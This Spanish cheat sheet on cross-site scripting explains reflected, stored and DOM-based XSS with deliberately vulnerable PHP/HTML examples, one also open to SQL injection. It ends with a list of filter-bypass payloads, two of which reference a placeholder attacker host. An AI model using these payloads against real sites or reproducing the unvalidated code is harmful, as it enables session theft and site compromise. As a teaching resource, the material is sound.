Cross-Site-Scripting (XSS) – Cheat Sheet

Cross-site scripting (XSS) es una vulnerabilidad que permite a un atacante inyectar código (normalmente HTML o JavaScript) en una web. Cuando una víctima ve una página infectada, el código inyectado se ejecuta en su navegador.
Hoy traemos un Cheat Sheet sobre esta vulnerabilidad que no es de las mas conocidas por el usuario común pero si es de las que mas aparecen en las webs.

Cross-Site-Scripting (XSS)

El ataque se realizara insertando en algun campo de la pagina web donde al estar mal validado consigamos ejecutar un script como este:

<script>alert("Hacked")</script>

A veces esta validación si que se realiza pero aun así en muchos casos es posible alterar nuestros scripts para conseguir saltarnos los filtros que se realicen.
Crearemos una pequeña lista sobre el bypass de los filtros al final de este post.

Para hablar de XSS tenemos que distinguir entre varios tipos que detallamos a continuación:

• XSS Reflected:

  El XSS reflected consiste en la inyección del script de manera que a traves de una url maliciosa el atacante pueda provocar la ejecución en el navegador de la víctima.
  Por ejemplo en el siguiente código de PHP

  <html>
  <h2>Bucador de palabras</h2>	
  <?php
     echo "<form action='index.php' method='get'>
     <p>Palabra a buscar: <input type='text' name='palabra'></p>
     <input type='submit' value='Enviar'>
     </form>
     <br>
     <br>";
     if($_GET){
  	echo "La palabra ".$_GET['palabra']. " ha obtenido el resultado de ...";
  	}
  ?>
  </html>
  

  Como vemos en el código anterior, se mostrará lo que se pase por el formulario mediante GET. Si lo vemos gráficamente podemos escribir el script en el input y ver que logramos ejecución.
  
  
  
  Si nos fijamos en la url obtenida al introducir el script veremos que aparece nuestro script aunque con el url encode

  http://vulnerable.com/index.php?palabra=%3Cscript%3Ealert%28%22Hacked%22%29%3C%2Fscript%3E

  Si este enlace se lo pasamos a alguien su navegador ejecutará el script que en este caso es un simple alert pero bien podriamos aplicar el robo de sesiones que teneis explicado aqui

• XSS Stored:

  Al contrario que el XSS reflected el XSS stored se guardará en la base de datos por lo que el script tendra persistencia.
  Es un tipo de XSS mas grave debido a que no se tendrá que recurrir al link malicioso si no que todo el que entre donde se muestre el script almacenado lo ejecutará.
  
  En este caso el script de PHP que podríamos encontrar sería algo como esto:
  

  <html>
  <h2>Mensajes</h2>	
  <?php
  include("conexion.php");
  echo "<form action='index.php' method='post'>
  <p>Mensaje a introducir: <input type='text' name='mensaje'></p>
  <input type='submit' value='Enviar'>
  </form>
  <br>
  <br>";
  if($_POST){
  	$mensaje=$_POST['mensaje'];
  	$conexion->query("insert into mensajes(mensaje) values('$mensaje')");
  	}
  $result=$conexion->query("select * from mensajes");
  while($line=mysqli_fetch_array($result)){	
  	echo "Mensaje: ".$line['mensaje']."<br>";
  		}
  ?>
  </html>
  

  Como vemos en este caso nos pedirá mediante un input los mensajes a guardar y también nos mostrará los mensajes guardados en la base de datos.
  En este caso también introducimos en el input el script y conseguiremos que cualquiera que visualice los mensajes ejecute el script.
  
  
  
  En este caso la ejecución se produce sin tener que engañar al usuario con un link por lo que es un ataque mas peligroso aunque también es menos común ya que la información guardada se valida con mas cuidado.

• DOM Based XSS:

  En este caso nuestra inyección no pasara por el servidor por lo que no se tendrán que transpasar sus filtros, el ataque se producira directamente sobre la estructura del documento HTML(DOM). En el lado del cliente es menos comun la validación de variables y rutas por lo que es mas dificil encontrarse filtros pero si nos podemos encontrar con que los navegadores actuales como la última versión de firefox convierten a url encode al usar los metodos document.baseURI, document.location.href, etc.
  

  <html>
  <h2 id="title">HI!</h2>
  <script>
  var URL =  document.baseURI;
  document.write("you are in "+URL);
  </script>
  </html>
  </script>
  </html>
  

  
  Este HTML simplemente te indica la pagina en la que estas, utilizando la ruta que aparece en el navegador. Si cambiamos la ruta añadiendo el # para que no se envie al servidor y despues el script conseguiremos que se ejecute el script.
  Como en el caso del XSS Reflected necesitaremos enviar la url maliciosa a la víctima ya que no se lográ persistencia.
  
  
  

<img src="jav	ascript:alert('hacked');">
<img src="jav&#x09;ascript:alert('hacked');">
<img src="jav&#x0D;ascript:alert('hacked');">
<<SCRIPT>alert("hacked");//<</SCRIPT>
<iframe src=http://attacker-ip/hacked.html <
<STYLE type="text/css">BODY{background:url("javascript:alert('hacked')")}</STYLE>
"><img src="x:x" onerror="alert(hacked)">
"><iframe src="javascript:alert(hacked)">
<object data="javascript:alert(hacked)">
<isindex type=image src=1 onerror=alert(hacked)>
<img src=x:alert(alt) onerror=eval(src) alt='hacked'>
<img  src="x:gif" onerror="window['al\u0065rt']('hacked')"></img>
<iframe/src="data:text/html,<svg onload=alert('hacked')>">
<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert('hacked')" http-equiv="refresh"/>
<svg><script xlink:href=data&colon;,window.open('https://attackerip/')></script
<meta http-equiv="refresh" content="0;url=javascript:confirm("hacked")">
<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
<form><a href="javascript:\u0061lert("hacked")">X